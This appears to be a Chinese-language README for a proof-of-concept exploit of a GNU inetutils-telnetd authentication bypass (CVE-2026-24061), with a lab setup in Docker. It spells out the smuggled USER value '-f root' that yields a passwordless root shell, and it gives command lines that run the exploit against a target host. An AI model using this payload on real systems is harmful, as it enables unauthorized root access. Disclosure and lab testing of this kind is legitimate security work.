GNU inetutils-telnetd 远程身份验证绕过
CVSS 评分:9.8 严重
GNU inetutils-telnetd 中的一个漏洞允许远程攻击者通过 NEW_ENVIRON telnet 选项绕过身份验证。通过发送包含值 "-f root" 的特制 USER 环境变量,攻击者可以诱使登录进程在无需凭据的情况下授予 root shell。
早于 2.6 的 GNU inetutils-telnetd 版本
telnetd 守护进程将 NEW_ENVIRON 协商中的 USER 环境变量直接传递给 /bin/login。当该值为 "-f root" 时,login 会将其解释为表示预身份验证的命令行标志,从而完全绕过密码验证。
./cve_2026_24061_telnetd.py <目标> [端口] [用户]
echo "id; whoami" | ./cve_2026_24061_telnetd.py 192.168.1.1
通过 Docker 提供了易受攻击的测试环境。
docker build -t vuln-telnetd -f Dockerfile.vulnerable .
docker run -d -p 2323:23 --name vuln-telnetd vuln-telnetd
echo "id" | python3 cve_2026_24061_telnetd.py localhost 2323
法律免责声明
本概念验证仅用于授权的安全研究和教育目的。未经授权访问计算机系统属于违法行为。作者不对本软件的滥用承担任何责任。用户全权负责确保在测试任何系统之前已获得适当授权。使用本工具即表示您同意仅对您拥有或已获得明确书面许可进行测试的系统使用本工具。